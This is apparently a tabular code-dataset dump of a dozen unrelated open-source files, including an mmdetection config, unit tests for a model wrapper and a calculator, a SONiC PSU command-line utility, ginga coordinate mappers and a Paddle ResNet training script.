max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5) |
---|---|---|---|---|---|---|
configs/efficientnet/retinanet_effb3_fpn_crop896_8x4_1x_coco.py | chenxinfeng4/mmdetection | 6 | 11300 | <filename>configs/efficientnet/retinanet_effb3_fpn_crop896_8x4_1x_coco.py
_base_ = [
'../_base_/models/retinanet_r50_fpn.py',
'../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
]
cudnn_benchmark = True
norm_cfg = dict(type='BN', requires_grad=True)
checkpoint = 'https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b3_3rdparty_8xb32-aa_in1k_20220119-5b4887a0.pth' # noqa
model = dict(
backbone=dict(
_delete_=True,
type='EfficientNet',
arch='b3',
drop_path_rate=0.2,
out_indices=(3, 4, 5),
frozen_stages=0,
norm_cfg=dict(
type='SyncBN', requires_grad=True, eps=1e-3, momentum=0.01),
norm_eval=False,
init_cfg=dict(
type='Pretrained', prefix='backbone', checkpoint=checkpoint)),
neck=dict(
in_channels=[48, 136, 384],
start_level=0,
out_channels=256,
relu_before_extra_convs=True,
no_norm_on_lateral=True,
norm_cfg=norm_cfg),
bbox_head=dict(type='RetinaSepBNHead', num_ins=5, norm_cfg=norm_cfg),
# training and testing settings
train_cfg=dict(assigner=dict(neg_iou_thr=0.5)))
# dataset settings
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
img_size = (896, 896)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=img_size,
ratio_range=(0.8, 1.2),
keep_ratio=True),
dict(type='RandomCrop', crop_size=img_size),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size=img_size),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=img_size,
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size=img_size),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(pipeline=train_pipeline),
val=dict(pipeline=test_pipeline),
test=dict(pipeline=test_pipeline))
# optimizer
optimizer_config = dict(grad_clip=None)
optimizer = dict(
type='SGD',
lr=0.04,
momentum=0.9,
weight_decay=0.0001,
paramwise_cfg=dict(norm_decay_mult=0, bypass_duplicate=True))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=1000,
warmup_ratio=0.1,
step=[8, 11])
# runtime settings
runner = dict(type='EpochBasedRunner', max_epochs=12)
# NOTE: This variable is for automatically scaling LR,
# USER SHOULD NOT CHANGE THIS VALUE.
default_batch_size = 32 # (8 GPUs) x (4 samples per GPU)
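# Rough illustration (assumption, following the common linear LR scaling rule that
# such auto-scaling variables are used for): with an actual total batch size of 16
# (e.g. 4 GPUs x 4 samples per GPU), the effective LR would be scaled as
# lr = 0.04 * 16 / 32 = 0.02.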
| 1.382813 | 1 |
tests/test_model.py | Sebastiencreoff/mongo_tool | 0 | 11301 | <gh_stars>0
#!/usr/bin/env python
import datetime
import mock
import mom
class ExampleClass(mom.Model):
JSON_SCHEMA = {
'$schema': 'http://json-schema.org/schema#',
'title': 'Test class for JSON',
'type': 'object',
'properties': {
'value_datetime': {'type': ['datetime', 'null']},
'value_int': {'type': ['number', 'null']},
'value_str': {'type': ['string', 'null']}}
}
    EXCLUDED_KEYS = {'to_dict'}
def __init__(self, data=None, value_int=None):
self.value_datetime = None
self.value_int = value_int
self.value_str = None
super().__init__(data=data)
def to_dict(self):
result = super().to_dict()
result.update({
'value_datetime': self.value_datetime,
'value_int': self.value_int,
'value_str': self.value_str})
return result
@mom.Model.with_update
def updates(self, value_datetime, value_str):
print('save_buy function')
self.value_datetime = value_datetime
self.value_str = value_str
def test_init():
mom.Model.session = mock.MagicMock()
# Test without data
obj = ExampleClass()
assert mom.Model.session.add.call_count == 1
assert mom.Model.session.update.call_count == 0
assert not obj.read_only
assert obj.id()
# Test with data
mom.Model.session.reset_mock()
obj2 = ExampleClass(data=obj.to_dict())
assert mom.Model.session.add.call_count == 0
assert mom.Model.session.update.call_count == 0
assert obj2.read_only
assert obj2.id() == obj.id()
def test_single_attr():
mom.Model.session = mock.MagicMock()
obj = ExampleClass()
mom.Model.session.reset_mock()
# Update one parameter.
obj.value_datetime = datetime.datetime.now()
assert mom.Model.session.add.call_count == 0
assert mom.Model.session.update.call_count == 1
def test_method():
mom.Model.session = mock.MagicMock()
obj = ExampleClass()
mom.Model.session.reset_mock()
# Update parameters with function.
obj.updates(value_datetime=datetime.datetime.now(), value_str='value')
assert mom.Model.session.add.call_count == 0
assert mom.Model.session.update.call_count == 1
| 2.5 | 2 |
src/koeda/utils/stopwords.py | toriving/KoEDA | 48 | 11302 | import os
import json
STOPWORDS_JSON_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.pardir, "corpora/stopwords.json"
)
with open(STOPWORDS_JSON_PATH, "r", encoding="utf-8") as f:
STOPWORD = json.load(f)["stopwords"]
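# Usage sketch (assumption: STOPWORD is a plain list of stopword strings loaded
# from corpora/stopwords.json above):
#
#     tokens = ["이", "문장", "은", "예시", "입니다"]
#     filtered = [t for t in tokens if t not in STOPWORD]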
| 2.3125 | 2 |
glue/core/tests/test_message.py | ejeschke/glue | 3 | 11303 | <reponame>ejeschke/glue
from __future__ import absolute_import, division, print_function
import pytest
from .. import message as msg
def test_invalid_subset_msg():
with pytest.raises(TypeError) as exc:
msg.SubsetMessage(None)
assert exc.value.args[0].startswith('Sender must be a subset')
def test_invalid_data_msg():
with pytest.raises(TypeError) as exc:
msg.DataMessage(None)
assert exc.value.args[0].startswith('Sender must be a data')
def test_invalid_data_collection_msg():
with pytest.raises(TypeError) as exc:
msg.DataCollectionMessage(None)
assert exc.value.args[0].startswith('Sender must be a DataCollection')
| 2.109375 | 2 |
fabfile/config.py | kurochan/config-collector | 1 | 11304 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import os
import util
from fabric.api import *
from fabric.state import output
from fabric.colors import *
from base import BaseTask
from helper.print_helper import task_puts
class CollectConfig(BaseTask):
"""
collect configuration
"""
name = "collect"
def run_task(self, *args, **kwargs):
host_config = env.inventory.get_variables(env.host)
hostname = host_config['ssh_host']
if not util.tcping(hostname, 22, 1):
task_puts("host {0} does not exist. skip...".format(hostname))
return
config = self.get_config(hostname, host_config['ssh_user'], host_config['ssh_pass'], host_config['exec_pass'], host_config['type'])
self.write_config(env.host, config)
# print config
def get_config(self, hostname, ssh_user, ssh_pass, exec_pass, os_type):
script_name = "dump-config-cisco-{0}.sh".format(os_type)
config = local(os.path.dirname(os.path.abspath(__file__)) + "/../bin/{0} {1} {2} {3}".format(script_name, ssh_user, hostname, ssh_pass), capture = True)
return config
def write_config(self, hostname, config):
output_dir = os.path.dirname(os.path.abspath(__file__)) + "/../tmp/config"
local("mkdir -p {0}".format(output_dir))
file = open("{0}/{1}.txt".format(output_dir, hostname), 'w')
file.write(str(config))
file.close()
collect = CollectConfig()
| 2.203125 | 2 |
python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | LWhite027/PaddleBox | 10 | 11305 | <filename>python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from inference_pass_test import InferencePassTest
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.core import AnalysisConfig
class TransposeFlattenConcatFusePassTRTTest(InferencePassTest):
def setUp(self):
with fluid.program_guard(self.main_program, self.startup_program):
data1 = fluid.data(
name="data1", shape=[8, 32, 128], dtype="float32")
data2 = fluid.data(
name="data2", shape=[8, 32, 128], dtype="float32")
trans1 = fluid.layers.transpose(data1, perm=[2, 1, 0])
trans2 = fluid.layers.transpose(data2, perm=[2, 1, 0])
flatt1 = fluid.layers.flatten(trans1)
flatt2 = fluid.layers.flatten(trans2)
concat_out = fluid.layers.concat([flatt1, flatt2])
# There is no parameters for above structure.
# Hence, append a batch_norm to avoid failure caused by load_combined.
out = fluid.layers.batch_norm(concat_out, is_test=True)
self.feeds = {
"data1": np.random.random([8, 32, 128]).astype("float32"),
"data2": np.random.random([8, 32, 128]).astype("float32")
}
self.enable_trt = True
self.trt_parameters = TransposeFlattenConcatFusePassTRTTest.TensorRTParam(
1 << 20, 8, 3, AnalysisConfig.Precision.Float32, False, False)
self.fetch_list = [out]
def test_check_output(self):
# There is no cpu pass for transpose_flatten_concat_fuse
if core.is_compiled_with_cuda():
use_gpu = True
self.check_output_with_option(use_gpu)
if __name__ == "__main__":
unittest.main()
| 2.265625 | 2 |
src/stage_02_base_model_creation.py | TUCchkul/Dog-Cat-Classification-with-MLflow | 0 | 11306 | import argparse
import os
import shutil
from tqdm import tqdm
import logging
from src.utils.common import read_yaml, create_directories
import random
from src.utils.model import log_model_summary
import tensorflow as tf
STAGE= "Base Model Creation"
logging.basicConfig(
filename=os.path.join("logs",'running_logs.log'),
level=logging.INFO,
format="[%(asctime)s: %(levelname)s: %(module)s]: %(message)s",
filemode="a")
def main(config_path):
config=read_yaml(config_path)
params=config["params"]
logging.info("Layer Defined")
LAYERS=[
tf.keras.layers.Input(shape=tuple(params["img_shape"])),
tf.keras.layers.Conv2D(filters=32, kernel_size=(3,3), activation="relu"),
tf.keras.layers.MaxPool2D(pool_size=(2,2)),
tf.keras.layers.Conv2D(32,(3,3), activation="relu"),
tf.keras.layers.MaxPool2D(pool_size=(2,2)),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(8, activation="relu"),
tf.keras.layers.Dense(2, activation="softmax")
]
classifier=tf.keras.Sequential(LAYERS)
logging.info(f"Base Model Summary:\n{log_model_summary(classifier)}")
classifier.compile(optimizer=tf.keras.optimizers.Adam(params["lr"]),
loss=params["loss"],
metrics=params["metrics"]
)
path_to_model_dir=os.path.join(config["data"]["local_dir"],
config["data"]["model_dir"]
)
create_directories([path_to_model_dir])
path_to_model=os.path.join(path_to_model_dir,
config["data"]["init_model_file"])
classifier.save(path_to_model)
logging.info(f"model is save at : {path_to_model}")
if __name__=="__main__":
args=argparse.ArgumentParser()
args.add_argument("--config", "-c", default="configs/config.yaml")
parsed_args=args.parse_args()
try:
logging.info("\n*********************")
logging.info(f">>>>>>>stage {STAGE} started <<<<<<<")
main(config_path=parsed_args.config)
logging.info(f">>>>>>>> stage {STAGE} completed! <<<<<<<<\n")
except Exception as e:
logging.exception(e)
raise e
| 2.140625 | 2 |
test_calculator.py | Kidatoy/Advanced-Calculator | 0 | 11307 | <reponame>Kidatoy/Advanced-Calculator
import unittest # https://docs.python.org/3/library/unittest.html
from modules.calculator import Calculator as Calc
class TestCalculator(unittest.TestCase):
"""
Test Driven Development Unittest File
Module: Calculator
Updated: 12/16/2019
Author: <NAME>
"""
def test_addition(self):
"""
Evaluate addition corner cases
"""
self.assertEqual(2, Calc().eval('1+1'))
self.assertEqual(2, Calc().eval('1.0+1.0'))
self.assertEqual(0, Calc().eval('-1+1'))
self.assertEqual(-2, Calc().eval('-1+-1'))
def test_subtraction(self):
"""
Evaluate subtraction corner cases
"""
self.assertEqual(0, Calc().eval('1-1'))
self.assertEqual(-2, Calc().eval('-1-1'))
self.assertEqual(0, Calc().eval('-1--1'))
def test_multiplication(self):
"""
Evaluate multiplication corner cases
"""
self.assertEqual(0, Calc().eval('1*0'))
self.assertEqual(0, Calc().eval('0*-1'))
self.assertEqual(1, Calc().eval('1*1'))
self.assertEqual(-1, Calc().eval('-1*1'))
self.assertEqual(1, Calc().eval('-1*-1'))
self.assertEqual(1, Calc().eval('.25*4'))
def test_division(self):
"""
Test division corner cases
Note: division by zero is handled in test_exceptions
"""
self.assertEqual(1, Calc().eval('1/1'))
self.assertEqual(.25, Calc().eval('1/4'))
self.assertEqual(-1, Calc().eval('-1/1'))
self.assertEqual(1, Calc().eval('-1/-1'))
self.assertEqual(0, Calc().eval('0/-1'))
def test_exponents(self):
"""
Test exponent corner cases
"""
self.assertEqual(1, Calc().eval('2^0'))
self.assertEqual(2, Calc().eval('2^1'))
self.assertEqual(4, Calc().eval('2^2'))
self.assertEqual(.5, Calc().eval('2^-1'))
self.assertEqual(4, Calc().eval('-2^2'))
def test_parentheses(self):
"""
Test parentheses corner cases
"""
self.assertEqual(5.0, Calc().eval('(4.0)+1'))
self.assertEqual(3.0, Calc().eval('(4+1)-2'))
self.assertEqual(5.0, Calc().eval('(5+-5)+5'))
self.assertEqual(-5.0, Calc().eval('(-10+3)+2'))
self.assertEqual(-26.0, Calc().eval('10-(3*2)^2'))
def test_pi(self):
"""
Test pi corner cases
"""
self.assertEqual(4.1415926535, Calc().eval('(pi)+1'))
self.assertEqual(1.1415926535, Calc().eval('(pi)-2'))
self.assertEqual(3.1415926535, Calc().eval('(pi+-5)+5'))
self.assertEqual(1.8584073465, Calc().eval('(-pi+3)+2'))
self.assertEqual(-29.478417602100684, Calc().eval('10-(pi*2)^2'))
self.assertEqual(1.57079632675, Calc().eval('pi/2'))
def test_e(self):
"""
Test e corner cases
"""
self.assertEqual(3.7182818284, Calc().eval('(e)+1'))
self.assertEqual(0.7182818283999999, Calc().eval('(e)-2'))
self.assertEqual(2.7182818284, Calc().eval('(e+-5)+5'))
self.assertEqual(2.2817181716, Calc().eval('(-e+3)+2'))
self.assertEqual(-19.556224394438587, Calc().eval('10-(e*2)^2'))
self.assertEqual(1.3591409142, Calc().eval('e/2'))
def test_phi(self):
"""
Test phi corner cases
"""
self.assertEqual(2.6180339886999997, Calc().eval('(phi)+1'))
self.assertEqual(-0.3819660113000001, Calc().eval('(phi)-2'))
self.assertEqual(1.6180339886999997, Calc().eval('(phi+-5)+5'))
self.assertEqual(3.3819660113000003, Calc().eval('(-phi+3)+2'))
self.assertEqual(-0.47213595435372646, Calc().eval('10-(phi*2)^2'))
self.assertEqual(0.80901699435, Calc().eval('phi/2'))
| 3.859375 | 4 |
pddf_psuutil/main.py | deran1980/sonic-utilities | 0 | 11308 | <reponame>deran1980/sonic-utilities
#!/usr/bin/env python3
#
# main.py
#
# Command-line utility for interacting with PSU Controller in PDDF mode in SONiC
#
try:
import sys
import os
import click
from tabulate import tabulate
from utilities_common.util_base import UtilHelper
except ImportError as e:
raise ImportError("%s - required module not found" % str(e))
VERSION = '2.0'
SYSLOG_IDENTIFIER = "psuutil"
PLATFORM_SPECIFIC_MODULE_NAME = "psuutil"
PLATFORM_SPECIFIC_CLASS_NAME = "PsuUtil"
# Global platform-specific psuutil class instance
platform_psuutil = None
platform_chassis = None
# Wrapper APIs so that this util is suited to both 1.0 and 2.0 platform APIs
def _wrapper_get_num_psus():
if platform_chassis is not None:
try:
return platform_chassis.get_num_psus()
except NotImplementedError:
pass
return platform_psuutil.get_num_psus()
def _wrapper_get_psu_name(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_name()
except NotImplementedError:
pass
return "PSU {}".format(idx)
def _wrapper_get_psu_presence(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_presence()
except NotImplementedError:
pass
return platform_psuutil.get_psu_presence(idx)
def _wrapper_get_psu_status(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_status()
except NotImplementedError:
pass
return platform_psuutil.get_psu_status(idx)
def _wrapper_get_psu_model(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_model()
except NotImplementedError:
pass
return platform_psuutil.get_model(idx)
def _wrapper_get_psu_mfr_id(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_mfr_id()
except NotImplementedError:
pass
return platform_psuutil.get_mfr_id(idx)
def _wrapper_get_psu_serial(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_serial()
except NotImplementedError:
pass
return platform_psuutil.get_serial(idx)
def _wrapper_get_psu_direction(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1)._fan_list[0].get_direction()
except NotImplementedError:
pass
return platform_psuutil.get_direction(idx)
def _wrapper_get_output_voltage(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_voltage()
except NotImplementedError:
pass
return platform_psuutil.get_output_voltage(idx)
def _wrapper_get_output_current(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_current()
except NotImplementedError:
pass
return platform_psuutil.get_output_current(idx)
def _wrapper_get_output_power(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_power()
except NotImplementedError:
pass
return platform_psuutil.get_output_power(idx)
def _wrapper_get_fan_rpm(idx, fan_idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1)._fan_list[fan_idx-1].get_speed_rpm()
except NotImplementedError:
pass
return platform_psuutil.get_fan_rpm(idx, fan_idx)
def _wrapper_dump_sysfs(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx).dump_sysfs()
except NotImplementedError:
pass
return platform_psuutil.dump_sysfs()
# ==================== CLI commands and groups ====================
# This is our main entrypoint - the main 'psuutil' command
@click.group()
def cli():
"""psuutil - Command line utility for providing PSU status"""
global platform_psuutil
global platform_chassis
if os.geteuid() != 0:
click.echo("Root privileges are required for this operation")
sys.exit(1)
# Load the helper class
helper = UtilHelper()
if not helper.check_pddf_mode():
click.echo("PDDF mode should be supported and enabled for this platform for this operation")
sys.exit(1)
# Load new platform api class
try:
import sonic_platform.platform
platform_chassis = sonic_platform.platform.Platform().get_chassis()
except Exception as e:
click.echo("Failed to load chassis due to {}".format(str(e)))
# Load platform-specific psuutil class if 2.0 implementation is not present
if platform_chassis is None:
try:
platform_psuutil = helper.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)
except Exception as e:
click.echo("Failed to load {}: {}".format(PLATFORM_SPECIFIC_MODULE_NAME, str(e)))
sys.exit(2)
# 'version' subcommand
@cli.command()
def version():
"""Display version info"""
click.echo("PDDF psuutil version {0}".format(VERSION))
# 'numpsus' subcommand
@cli.command()
def numpsus():
"""Display number of supported PSUs on device"""
click.echo(_wrapper_get_num_psus())
# 'status' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def status(index):
"""Display PSU status"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
header = ['PSU', 'Status']
status_table = []
for psu in psu_ids:
msg = ""
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
presence = _wrapper_get_psu_presence(psu)
if presence:
oper_status = _wrapper_get_psu_status(psu)
msg = 'OK' if oper_status else "NOT OK"
else:
msg = 'NOT PRESENT'
status_table.append([psu_name, msg])
if status_table:
click.echo(tabulate(status_table, header, tablefmt="simple"))
# 'mfrinfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def mfrinfo(index):
"""Display PSU manufacturer info"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
for psu in psu_ids:
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
status = _wrapper_get_psu_status(psu)
if not status:
click.echo("{} is Not OK\n".format(psu_name))
continue
model_name = _wrapper_get_psu_model(psu)
mfr_id = _wrapper_get_psu_mfr_id(psu)
serial_num = _wrapper_get_psu_serial(psu)
airflow_dir = _wrapper_get_psu_direction(psu)
click.echo("{} is OK\nManufacture Id: {}\n" \
"Model: {}\nSerial Number: {}\n" \
"Fan Direction: {}\n".format(psu_name, mfr_id, model_name, serial_num, airflow_dir.capitalize()))
# 'seninfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def seninfo(index):
"""Display PSU sensor info"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
for psu in psu_ids:
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
oper_status = _wrapper_get_psu_status(psu)
if not oper_status:
click.echo("{} is Not OK\n".format(psu_name))
continue
v_out = _wrapper_get_output_voltage(psu) * 1000
i_out = _wrapper_get_output_current(psu) * 1000
p_out = _wrapper_get_output_power(psu) * 1000
fan1_rpm = _wrapper_get_fan_rpm(psu, 1)
click.echo("{} is OK\nOutput Voltage: {} mv\n" \
"Output Current: {} ma\nOutput Power: {} mw\n" \
"Fan1 Speed: {} rpm\n".format(psu_name, v_out, i_out, p_out, fan1_rpm))
@cli.group()
def debug():
"""pddf_psuutil debug commands"""
pass
@debug.command()
def dump_sysfs():
"""Dump all PSU related SysFS paths"""
for psu in range(_wrapper_get_num_psus()):
status = _wrapper_dump_sysfs(psu)
if status:
for i in status:
click.echo(i)
if __name__ == '__main__':
cli()
| 2.296875 | 2 |
gifbox/core/serializers.py | timmygee/gifbox | 0 | 11309 | <gh_stars>0
from rest_framework import serializers
from versatileimagefield.serializers import VersatileImageFieldSerializer
from .models import Image, AnimatedGif
class ImageSerializer(serializers.ModelSerializer):
class Meta:
model = Image
fields = ('image',)
image = VersatileImageFieldSerializer(
sizes=[
('full_size', 'url'),
('thumbnail', 'thumbnail__200x200'),
]
)
class AnimatedGifSerializer(serializers.ModelSerializer):
class Meta:
model = AnimatedGif
fields = ('id', 'image', 'created', 'period')
image = VersatileImageFieldSerializer(
sizes=[
('full_size_url', 'url'),
('thumbnail_url', 'thumbnail__200x200'),
]
)
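# Usage sketch (hypothetical object names; standard DRF serializer call pattern):
#
#     gif = AnimatedGif.objects.first()
#     data = AnimatedGifSerializer(gif).data
#     # -> {'id': ..., 'image': {'full_size_url': ..., 'thumbnail_url': ...},
#     #     'created': ..., 'period': ...}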
| 2.125 | 2 |
ginga/canvas/coordmap.py | saimn/ginga | 0 | 11310 | <filename>ginga/canvas/coordmap.py
#
# coordmap.py -- coordinate mappings.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga import trcalc
from ginga.util import wcs
from ginga.util.six.moves import map
__all__ = ['CanvasMapper', 'DataMapper', 'OffsetMapper', 'WCSMapper']
class CanvasMapper(object):
"""A coordinate mapper that maps to the viewer's canvas in
canvas coordinates.
"""
def __init__(self, viewer):
# record the viewer just in case
self.viewer = viewer
def to_canvas(self, canvas_x, canvas_y):
return (canvas_x, canvas_y)
def to_data(self, canvas_x, canvas_y):
return self.viewer.get_data_xy(canvas_x, canvas_y)
def data_to(self, data_x, data_y):
return self.viewer.get_canvas_xy(data_x, data_y)
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return x + xoff, y + yoff
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
# TODO? Not sure if it is needed with this mapper type
return x, y
class CartesianMapper(object):
"""A coordinate mapper that maps to the viewer's canvas
in Cartesian coordinates that do not scale (unlike DataMapper).
"""
def __init__(self, viewer):
self.viewer = viewer
def to_canvas(self, crt_x, crt_y):
return self.viewer.offset_to_window(crt_x, crt_y)
def to_data(self, crt_x, crt_y):
return self.viewer.offset_to_data(crt_x, crt_y)
def data_to(self, data_x, data_y):
return self.viewer.data_to_offset(data_x, data_y)
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return x + xoff, y + yoff
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
return trcalc.rotate_pt(x, y, theta, xoff=xoff, yoff=yoff)
class DataMapper(object):
"""A coordinate mapper that maps to the viewer's canvas
in data coordinates.
"""
def __init__(self, viewer):
self.viewer = viewer
def to_canvas(self, data_x, data_y):
return self.viewer.canvascoords(data_x, data_y)
def to_data(self, data_x, data_y):
return data_x, data_y
def data_to(self, data_x, data_y):
return data_x, data_y
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return x + xoff, y + yoff
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
return trcalc.rotate_pt(x, y, theta, xoff=xoff, yoff=yoff)
class OffsetMapper(object):
"""A coordinate mapper that maps to the viewer's canvas
in data coordinates that are offsets relative to some other
reference object.
"""
def __init__(self, viewer, refobj):
# TODO: provide a keyword arg to specify which point in the obj
self.viewer = viewer
self.refobj = refobj
def calc_offsets(self, points):
ref_x, ref_y = self.refobj.get_reference_pt()
#return map(lambda x, y: x - ref_x, y - ref_y, points)
def _cvt(pt):
x, y = pt
return x - ref_x, y - ref_y
return map(_cvt, points)
def to_canvas(self, delta_x, delta_y):
data_x, data_y = self.to_data(delta_x, delta_y)
return self.viewer.canvascoords(data_x, data_y)
def to_data(self, delta_x, delta_y):
ref_x, ref_y = self.refobj.get_reference_pt()
data_x, data_y = self.refobj.crdmap.to_data(ref_x, ref_y)
return data_x + delta_x, data_y + delta_y
## def data_to(self, data_x, data_y):
## ref_x, ref_y = self.refobj.get_reference_pt()
## return data_x - ref_data_x, data_y - ref_data_y
def offset_pt(self, pt, xoff, yoff):
# A no-op because this object's points are always considered
# relative to the reference object
return pt
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
# TODO? Not sure if it is needed with this mapper type
return x, y
class WCSMapper(DataMapper):
"""A coordinate mapper that maps to the viewer's canvas
in WCS coordinates.
"""
def to_canvas(self, lon, lat):
data_x, data_y = self.to_data(lon, lat)
return super(WCSMapper, self).to_canvas(data_x, data_y)
def to_data(self, lon, lat):
image = self.viewer.get_image()
data_x, data_y = image.radectopix(lon, lat)
return data_x, data_y
def data_to(self, data_x, data_y):
image = self.viewer.get_image()
lon, lat = image.pixtoradec(data_x, data_y)
return lon, lat
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return wcs.add_offset_radec(x, y, xoff, yoff)
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
# TODO: optomize by rotating in WCS space
xoff, yoff = self.to_data(xoff, yoff)
x, y = super(WCSMapper, self).rotate_pt(x, y, theta,
xoff=xoff, yoff=yoff)
x, y = self.data_to(x, y)
return x, y
#END
| 2.671875 | 3 |
train.py | zpc-666/Paddle-Stochastic-Depth-ResNet110 | 0 | 11311 | # coding: utf-8
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.nn as nn
import importlib
from visualdl import LogWriter
import numpy as np
import pickle
from models import utils
from config import parser_args
def train_model(args):
if args.dataset=='cifar10':
root = os.path.join(args.data_dir, args.dataset, 'cifar-10-python.tar.gz')
print(args)
model = importlib.import_module('models.__init__').__dict__[args.net](
None, drop_path_rate=args.drop_path_rate, use_drop_path=args.use_drop_path, use_official_implement=args.use_official_implement)
train_loader, val_loader, test_loader = importlib.import_module(
'dataset.' + args.dataset).__dict__['load_data'](root, args.train_batch_size,
args.test_batch_size, has_val_dataset=args.has_val_dataset)
writer = LogWriter(logdir=args.save_dir)
criterion = nn.CrossEntropyLoss()
if args.optimizer == 'sgd':
lr_scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=args.learning_rate, milestones=args.milestones, gamma=args.gamma)
optimizer = paddle.optimizer.Momentum(parameters=model.parameters(),
learning_rate=lr_scheduler,
momentum=args.momentum,
weight_decay=args.weight_decay,
use_nesterov=args.nesterov)
elif args.optimizer == 'adam':
optimizer = paddle.optimizer.AdamW(parameters=model.parameters(),
learning_rate=args.learning_rate,
weight_decay=args.weight_decay)
else:
raise ValueError("optimizer must be sgd or adam.")
best_acc = 0
for i in range(args.epochs):
utils.train_per_epoch(train_loader, model, criterion, optimizer, i, writer)
top1_acc, top5_acc = utils.validate(val_loader, model, criterion)
if args.optimizer == 'sgd':
lr_scheduler.step()
if best_acc < top1_acc:
paddle.save(model.state_dict(),
args.save_dir + '/model_best.pdparams')
best_acc = top1_acc
if not args.save_best:
if (i + 1) % args.save_interval == 0 and i != 0:
paddle.save(model.state_dict(),
args.save_dir + '/model.pdparams')
writer.add_scalar('val-acc', top1_acc, i)
writer.add_scalar('val-top5-acc', top5_acc, i)
writer.add_scalar('lr', optimizer.get_lr(), i)
print('best acc: {:.2f}'.format(best_acc))
model.set_state_dict(paddle.load(args.save_dir + '/model_best.pdparams'))
top1_acc, top5_acc = utils.validate(test_loader, model, criterion)
